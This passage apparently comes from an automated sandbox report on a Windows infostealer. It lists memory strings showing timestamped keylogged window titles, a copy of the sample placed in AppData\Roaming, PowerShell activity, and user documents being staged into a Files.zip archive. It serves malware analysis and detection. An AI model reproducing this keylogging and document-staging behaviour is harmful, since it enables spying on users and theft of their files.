                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:54]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:48:14]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:27]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:11]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>q
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:40Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:55]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 47:07]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:09]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:50]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager>>v
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:53]<<Program Manager>>q
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:46]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:56]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:12]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.00000000011F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FC:\Users\user\AppData\Local\CommsBte}!\\<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogram Manager=`,
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:53]<<Program Manager>>v
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:32]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:40]<<Program ManagerI}
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:48:14Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:46]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:13]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:31]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:40]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:48]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:11]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:42]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:43]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:47]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<<Program Manager
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:07]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57]<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 46:42]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:49]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FC:\Users\user\AppData\Local\Adobe753D193B28082F181D0714131933073714:46:27]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>(
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :47:14]<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:50]<<Program Managerr d=arguments[c];if(d)for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a||na});
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :47:50]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:39]<<Program Manager
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7:09]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:14]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:27]..Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, KeyDatawIMKYJdN.txt.14.drBinary or memory string: [14:47:40]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:30]<<Program Manager>>
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\KATAXZVCPS.pdf VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\LSBIHQFDVT.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\MNULNCRIYC.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PSAMNLJHZW.docx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.pdf VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZSSZYEFYMU.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\XgbXowhljC.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.docx VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AFWAAFRXKO.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\AIXACVYBSB.pdf VolumeInformation
